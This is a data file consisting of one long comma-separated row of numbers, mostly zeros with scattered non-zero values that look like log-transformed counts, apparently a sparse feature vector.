0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.605802066295998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 8.114299381106088, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.581130849408909, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2958368660043296, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.292158018817389, 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 